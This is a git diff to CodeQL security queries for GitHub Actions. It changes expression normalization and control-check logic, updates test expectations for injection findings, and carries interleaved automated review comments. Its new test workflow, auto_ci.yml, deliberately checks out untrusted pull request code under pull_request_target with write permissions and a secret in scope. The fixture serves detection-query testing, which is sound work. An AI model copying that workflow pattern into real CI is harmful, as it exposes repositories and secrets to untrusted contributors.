+++ b/ql/lib/codeql/actions/Ast.qll @@ -1,6 +1,16 @@ private import codeql.actions.ast.internal.Ast private import codeql.Locations +module Utils { + bindingset[expr] + string normalizeExpr(string expr) { + result = + expr.regexpReplaceAll("[\\.\\'\\[\\]\"]+", ".") + .regexpReplaceAll("\\.$", "") + .regexpReplaceAll("\\.\\s", " ") + } +} + class AstNode instanceof AstNodeImpl { AstNode getAChildNode() { result = super.getAChildNode() } @@ -188,6 +198,8 @@ class Step extends AstNode instanceof StepImpl { */ class If extends AstNode instanceof IfImpl { string getCondition() { result = super.getCondition() } + + Expression getConditionExpr() { result = super.getConditionExpr() } } abstract class Uses extends AstNode instanceof UsesImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 028f2280680..14f3cd2ecd9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -45,6 +45,14 @@ private newtype TAstNode = ) ) ) + or + // if's conditions do not need to be delimted with ${{}} + exists(YamlMapping m | + m.maps(key, value) and + key.(YamlScalar).getValue() = ["if"] and + value.getValue() = raw and + exprOffset = 1 + ) } or TCompositeAction(YamlMapping n) { n instanceof YamlDocument and @@ -123,7 +131,7 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { override Location getLocation() { result = value.getLocation() } - override YamlNode getNode() { result = value } + override YamlScalar getNode() { result = value } } class ExpressionImpl extends AstNodeImpl, TExpressionNode { 
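Review bot: `Utils::normalizeExpr` is added to the public `Ast.qll` without QLDoc, and the three chained `regexpReplaceAll` calls do not explain themselves. A doc comment such as `/** Rewrites bracket and quote index notation to dotted form, e.g. github['event'].number becomes github.event.number. */` would state the contract. The function also leaves whitespace around dots untouched, whereas the source patterns in `FlowSources.qll` accept `\s*\.\s*`, so an expression written with spaces around the dots can satisfy the source regexes and still miss the substring tests in `containsHeadRef` and `ControlCheck`. Collapsing `\s*\.\s*` to `.` as a first step would keep the two in agreement.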
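Review bot: The new `if` disjunct of `TExpressionNode` binds `raw` to the whole scalar and fixes `exprOffset = 1` with no explanation of the constant, and its relation to the `exprOffset - 1` used in `ExpressionImpl` is not obvious; a comment saying what offset 1 denotes would help. The comment above the disjunct has a typo (`delimted`). If the preceding disjunct, which starts outside this hunk, already yields nodes for `${{ }}` spans, an `if:` value that uses delimiters may now get a second node for overlapping text, so restricting this branch to values without delimiters is worth considering. `key.(YamlScalar).getValue() = ["if"]` can be written as `= "if"`.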
@@ -135,15 +143,16 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { ExpressionImpl() { this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and - expression = - rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") + then expression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else expression = rawExpression.trim() } override string toString() { result = expression } override AstNodeImpl getAChildNode() { none() } - override AstNodeImpl getParentNode() { result.getNode() = value } + override ScalarValueImpl getParentNode() { result.getNode() = value } override string getAPrimaryQlClass() { result = "ExpressionNode" } @@ -638,6 +647,9 @@ class IfImpl extends AstNodeImpl, TIfNode { /** Gets the condition that must be satisfied for this job to run. */ string getCondition() { result = n.(YamlScalar).getValue() } + + /** Gets the condition that must be satisfied for this job to run. */ + ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } } class EnvImpl extends AstNodeImpl, TEnvNode { diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 0b3a2873d51..438e3dfe7fc 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
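Review bot: In the `ExpressionImpl` characteristic predicate the patterns `\\$\\{\\{.*\\}\\}` and `\\$\\{\\{\\s*(.*)\\s*\\}\\}` use `.` without the DOTALL flag, so a `${{ … }}` that spans several lines fails the `regexpMatch`, takes the `else` branch and keeps its delimiters in `expression`. The context predicates that match on `expression` would then presumably miss it, which is a false negative for the injection queries. Prefixing both patterns with `(?s)` covers that case: `regexpMatch("(?s)\\$\\{\\{.*\\}\\}")` and `regexpCapture("(?s)\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1)`. Whether `rawExpression` can contain a line break depends on code outside this hunk.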
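Review bot: The QLDoc added on `IfImpl.getConditionExpr()` repeats the comment on `getCondition()` word for word, so the string-valued and the node-valued member cannot be told apart from their documentation. I would write `/** Gets the condition of this if as an expression node. */` and mention there whether more than one result is possible. The rest of `IfImpl` is outside this hunk.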
@@ -18,29 +18,32 @@ import actions /** An If node that contains an actor, user or label check */ class ControlCheck extends If { ControlCheck() { - this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or - this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") + Utils::normalizeExpr(this.getCondition()) + .regexpMatch([ + ".*github\\.actor.*", ".*github\\.triggering_actor.*", + ".*github\\.event\\.pull_request\\.user\\.login.*", + ".*github\\.event\\.pull_request\\.labels.*", ".*github\\.event\\.label\\.name.*" + ]) } } bindingset[s] predicate containsHeadRef(string s) { - s.matches("%" + - [ - "github.event.number", // The pull request number. - "github.event.pull_request.head.ref", // The ref name of head. - "github.event.pull_request.head.sha", // The commit SHA of head. - "github.event.pull_request.id", // The pull request ID. - "github.event.pull_request.number", // The pull request number. - "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. - "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. - "github.event.workflow_run.head_branch", // The branch of the head commit. - "github.event.workflow_run.head_commit.id", // The SHA of the head commit. - "github.event.workflow_run.head_sha", // The SHA of the head commit. - "env.GITHUB_HEAD_REF", - ] + "%") + Utils::normalizeExpr(s) + .matches("%" + + [ + "github.event.number", // The pull request number. + "github.event.pull_request.head.ref", // The ref name of head. + "github.event.pull_request.head.sha", // The commit SHA of head. + "github.event.pull_request.id", // The pull request ID. + "github.event.pull_request.number", // The pull request number. + "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. 
+ "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. + "github.event.workflow_run.head_branch", // The branch of the head commit. + "github.event.workflow_run.head_commit.id", // The SHA of the head commit. + "github.event.workflow_run.head_sha", // The SHA of the head commit. + "env.GITHUB_HEAD_REF", + ] + "%") } /** Checkout of a Pull Request HEAD ref */ diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4ef2a2e5875..df8c6ddf9cd 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -190,7 +190,7 @@ parentNodes | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | 
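Review bot: `ControlCheck` accepts any `if` whose normalized text merely contains one of the context names, so `.*github\\.actor.*` also matches longer names such as `github.actor_id`, and a condition that mentions the actor inside a negation or an `||` alternative counts as a check too. If the query uses this class to treat a checkout as guarded (that use is outside this hunk), such conditions can hide an unsafe checkout from the results. At minimum add word boundaries, e.g. `".*\\bgithub\\.actor\\b.*"`, and say in the QLDoc that the class is a syntactic heuristic, not proof that the condition restricts who can trigger the job. Because `.` does not match line breaks, a multi-line condition never matches either; that errs toward reporting, but it is worth a comment.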
@@ -415,3 +415,8 @@ calls | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 8cf97d58ab0..268396a711e 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,5 @@ import codeql.actions.Ast +import codeql.actions.Ast::Utils as Utils import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations @@ -59,3 +60,12 @@ query predicate summaries(string action, string version, string input, string ou query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } + +query string testNormalizeExpr(string s) { + s = + [ + "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]", + "github.event.pull_request['user']['login']", "foo['bar'] == baz" + ] and + result = Utils::normalizeExpr(s) +} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index c9ac215666f..38884b3eaef 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
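Review bot: `testNormalizeExpr` only exercises quoted bracket access, so it does not pin what happens to numeric indexes or to string literals. With the pattern added to Ast.qll in this commit, `github.event.commits[0].message` would come out as `github.event.commits.0.message`, and the quotes and brackets inside a literal such as `'dependabot[bot]'` are rewritten as well. I would add both inputs to the list, plus one with spaces around a dot, so that the expected output documents the intended behaviour for patterns that match indexes as `\\[[0-9]+\\]`.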
@@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -58,6 +59,8 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -187,6 +190,7 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index cb924c97ea1..21a9978c54f 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -58,6 +59,8 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -188,6 +191,7 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml new file mode 100644 index 00000000000..cb20cfe629b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml 
@@ -0,0 +1,135 @@ +name: Python CI + +on: + push: + branches: [ master ] + pull_request_target: + branches: [ master, stable ] + +concurrency: + group: ${{ format('ci-{0}', github.head_ref && format('pr-{0}', github.event.pull_request.number) || github.sha) }} + cancel-in-progress: ${{ github.event_name == 'pull_request_target' }} + +jobs: + lint: + runs-on: ubuntu-latest + env: + min-python-version: "3.10" + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ env.min-python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ env.min-python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Lint with flake8 + run: flake8 + + - name: Check black formatting + run: black . --check + if: success() || failure() + + - name: Check isort formatting + run: isort . --check + if: success() || failure() + + - name: Check mypy formatting + run: mypy + if: success() || failure() + + test: + permissions: + # Gives the action the necessary permissions for publishing new + # comments in pull requests. 
+ pull-requests: write + # Gives the action the necessary permissions for pushing data to the + # python-coverage-comment-action branch, and for editing existing + # comments (to avoid publishing multiple comments in the same PR) + contents: write + runs-on: ubuntu-latest + strategy: + matrix: + python-version: ["3.10"] + + steps: + - name: Check out repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ matrix.python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ matrix.python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Run unittest tests with coverage + run: | + pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term + env: + CI: true + PROXY: ${{ secrets.PROXY }} + AGENT_MODE: ${{ vars.AGENT_MODE }} + AGENT_TYPE: ${{ vars.AGENT_TYPE }} + + - name: Upload coverage reports to Codecov + uses: codecov/codecov-action@v3 + + - name: Stage new files and commit + id: stage_files + run: | + git add tests + git diff --cached --quiet && echo "No changes to commit" && exit 0 + git config user.email "github-actions@github.com" + git config user.name "GitHub Actions" + git commit -m "Add new cassettes" + TIMESTAMP_COMMIT=$(date +%Y%m%d%H%M%S) # generate a timestamp + echo "TIMESTAMP_COMMIT=TIMESTAMP_COMMIT" >> $GITHUB_ENV + + + - name: Create PR + id: create_pr + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: peter-evans/create-pull-request@v5 + with: + commit-message: Update cassettes + branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} + title: "Update cassette-diff-PR${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }}" + body: "This PR updates the cassettes. Please merge it." 
+ + + - name: Check PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: | + echo "Pull Request Number - ${{ steps.create_pr.outputs.pull-request-number }}" + echo "Pull Request URL - ${{ steps.create_pr.outputs.pull-request-url }}" + + - name: Comment PR URL in the current PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: thollander/actions-comment-pull-request@v2 + with: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + message: | + Please click [HERE](${{ steps.create_pr.outputs.pull-request-url }}) and merge this PR to update the cassettes. + + - name: Fail if new PR created + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: exit 1 diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 6620d2ac385..67fcc5555d1 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,5 +1,8 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | 
.github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 7527a1e15f2..be1c7cbfebd 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1 +1,4 @@ -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 87b284e5e6b49b431aef3c23099ac80b0fe8753e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 19:14:57 +0100 Subject: [PATCH 0093/1267] update --- ql/lib/codeql/actions/Ast.qll | 8 +- .../codeql/actions/dataflow/FlowSources.qll | 89 +++++++++++-------- 2 files changed, 55 insertions(+), 42 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 271182a05dd..3d675bebce0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -5,9 +5,11 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - expr.regexpReplaceAll("[\\.\\'\\[\\]\"]+", ".") - .regexpReplaceAll("\\.$", "") - .regexpReplaceAll("\\.\\s", " ") + expr.replaceAll("['", ".") + .replaceAll("']", "") + .replaceAll("[\"", ".") + .replaceAll("\"]", "") + .regexpReplaceAll("\\s*\\.\\s*", ".") } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 23ae225e07e..d3a96e1a2c7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,6 +1,7 @@ import actions import codeql.actions.DataFlow import codeql.actions.dataflow.ExternalFlow +import codeql.actions.Ast::Utils as Utils /** * A data flow source. @@ -24,8 +25,11 @@ abstract class RemoteFlowSource extends SourceNode { bindingset[context] private predicate isExternalUserControlledIssue(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*body\\b") + exists(string reg | + reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] 
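Review bot: `normalizeExpr` has no QLDoc, and after this rewrite it recognises only the exact sequences `['`, `']`, `["` and `"]`, so an index written with inner spaces such as `event[ 'issue' ]` stays unnormalized and would not match the source patterns (assuming the expression syntax tolerates that whitespace). The replacements are also applied inside string literals, which is harmless for matching but should be stated. I would document the contract above the predicate, e.g. `/** Rewrites quoted bracket access (a['b'], a["b"]) to dot access and removes whitespace around dots; numeric indexes are kept. */`, and extend the replacements to tolerate whitespace if spaced indexes should be covered.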
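Review bot: The patterns in `isExternalUserControlledIssue` stay case-sensitive after normalization, while property names in workflow expressions are, as far as I know, resolved case-insensitively, so a differently cased spelling such as `github.event.issue.Title` would not be classified as a source. Prefixing the patterns with `(?i)`, e.g. `"(?i)\\bgithub\\.event\\.issue\\.title\\b"`, closes that gap. The same applies to the pull request, review, comment, gollum, commit, discussion and workflow_run predicates changed in the following hunks of this file. Since `regexpMatch` has to match the whole string, the `\\b` anchors add nothing and could be dropped at the same time.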
